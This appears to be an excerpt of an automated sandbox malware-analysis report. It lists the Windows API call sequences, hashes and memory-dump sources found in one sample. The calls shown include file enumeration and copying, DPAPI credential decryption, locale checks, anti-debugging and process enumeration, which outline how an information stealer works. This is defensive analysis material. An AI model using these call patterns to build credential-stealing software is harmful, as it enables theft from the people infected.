                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                          • String ID: \*.*
                                          • API String ID: 1415058207-1173974218
                                          • Opcode ID: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                          • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                          • Opcode Fuzzy Hash: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                          • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022CDD52
                                          • StrCmpCA.SHLWAPI(?,004214B4), ref: 022CDD9A
                                          • StrCmpCA.SHLWAPI(?,004214B8), ref: 022CDDB0
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CE033
                                          • FindClose.KERNEL32(000000FF), ref: 022CE045
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                          • Instruction ID: c6b5f16b8e64a039395c756452f223e60a42b12f57dc181953bac84f3bc60cba
                                          • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                          • Instruction Fuzzy Hash: AA914272A207049BCB14FBF4DD55DEE737AAF95300F10476CA84A96148EF389B588F91
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                          • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                          • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                          • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                          • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                          • Opcode Fuzzy Hash: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                          • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                          APIs
                                          • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00792F70,?,0042110C,?,00000000,?), ref: 0041696C
                                          • sscanf.NTDLL ref: 00416999
                                          • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00792F70,?,0042110C), ref: 004169B2
                                          • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00792F70,?,0042110C), ref: 004169C0
                                          • ExitProcess.KERNEL32 ref: 004169DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID: (*y$B
                                          • API String ID: 2533653975-309670884
                                          • Opcode ID: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                          • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                          • Opcode Fuzzy Hash: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                          • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022CF985
                                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 022CF9D6
                                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 022CF9EC
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CFD18
                                          • FindClose.KERNEL32(000000FF), ref: 022CFD2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                          • Instruction ID: 9c6515491348ced743e3935e0b151c931453b8388f1e6d6281e8aba3c4cff97b
                                          • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                          • Instruction Fuzzy Hash: 37B16171A203589BCB28FFE4DD91EEE737AAF55300F1082ADA40A56158EF345B49CF91
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022CE709
                                          • StrCmpCA.SHLWAPI(?,004214F8), ref: 022CE759
                                          • StrCmpCA.SHLWAPI(?,004214FC), ref: 022CE76F
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CEE46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                          • String ID: (Py$@0y
                                          • API String ID: 433455689-807888910
                                          • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                          • Instruction ID: 82e7de573d969f1835642412ffd2ac64c0f503e8b337fb10474b77eaf88447ae
                                          • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                          • Instruction Fuzzy Hash: 3B124E71A203589BCB18FBE4DD95EED733AAF64300F5046ADA10A52198EF346F88CF51
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022C1B8A
                                          • StrCmpCA.SHLWAPI(?,0042526C), ref: 022C1BDA
                                          • StrCmpCA.SHLWAPI(?,00425314), ref: 022C1BF0
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022C1FA7
                                          • DeleteFileA.KERNEL32(00000000), ref: 022C2031
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022C2087
                                          • FindClose.KERNEL32(000000FF), ref: 022C2099
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 1415058207-0
                                          • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                          • Instruction ID: 5db1ff26bd3ece8c2e4893695d5e34c85553e1e503a9cf305565941426e1d9c4
                                          • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                          • Instruction Fuzzy Hash: E9123C71920358ABCB19FBE4CD95EED737AAF24300F54429DA10A62198EF346F89CF50
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                          • LocalFree.KERNEL32(00000000), ref: 00417D22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                          • String ID: /
                                          • API String ID: 3090951853-4001269591
                                          • Opcode ID: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                          • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                          • Opcode Fuzzy Hash: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                          • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                          APIs
                                          • memset.MSVCRT ref: 022CCABA
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022CCAD8
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022CCAE3
                                          • memcpy.MSVCRT(?,?,?), ref: 022CCB79
                                          • lstrcat.KERNEL32(?,00420B46), ref: 022CCBAA
                                          • lstrcat.KERNEL32(?,00420B47), ref: 022CCBBE
                                          • lstrcat.KERNEL32(?,00420B4E), ref: 022CCBDF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                          • Instruction ID: 6e5a62b3712b0c31b7478b0746c4088761a0352dc74290c84553fc54ce6fa778
                                          • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                          • Instruction Fuzzy Hash: 6541807895421AEFDB10DFD0DD88BEEBBB8BB44304F1045A9E509A6284D7745B84CF91
                                          APIs
                                          • memset.MSVCRT ref: 0040C853
                                          • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00792FC0), ref: 0040C871
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                          • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                          • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                          • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                          • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                          • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                          • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                          • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                          • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptLocalString$AllocFree
                                          • String ID: N@
                                          • API String ID: 4291131564-4229412743
                                          • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                          • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022D7E48
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 022D7E60
                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 022D7E74
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022D7EC9
                                          • LocalFree.KERNEL32(00000000), ref: 022D7F89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                          • String ID:
                                          • API String ID: 3090951853-0
                                          • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                          • Instruction ID: afd9527a827bcb272ac1be765c7c566a724b4587b72bb8e44166842155630b25
                                          • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                          • Instruction Fuzzy Hash: C6412A71960228ABCB24DF94DC89FEDB3B5FB54704F204299E009A6294DB782F85CF91
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 022DBE09
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022DBE1E
                                          • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022DBE29
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 022DBE45
                                          • TerminateProcess.KERNEL32(00000000), ref: 022DBE4C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction ID: 788d850d13cb3a8b6c372f95439151463eb30cd959cb2ec778f8ec80857d2dd8
                                          • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction Fuzzy Hash: 5B21A0BC9103059FDB14DF69F8896963BE4FB0A314F51403AE90A872A4EBB05985EF49
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                          • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                          • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                          • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                          • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022C74B4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022C74BB
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022C74E8
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022C750B
                                          • LocalFree.KERNEL32(?), ref: 022C7515
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                          • String ID:
                                          • API String ID: 2609814428-0
                                          • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction ID: 9817fafd616a3c3f236b6159a8ba0aaf3880590db66b457e3a33513daf84744b
                                          • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction Fuzzy Hash: E6010075A90208BFEB10DFD4DD45F9D77B9EB44704F108159FB05AA2C4D6B0AA00CB65
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                          • String ID:
                                          • API String ID: 3657800372-0
                                          • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                          • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                          • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022D9885
                                          • Process32First.KERNEL32(00420ACA,00000128), ref: 022D9899
                                          • Process32Next.KERNEL32(00420ACA,00000128), ref: 022D98AE
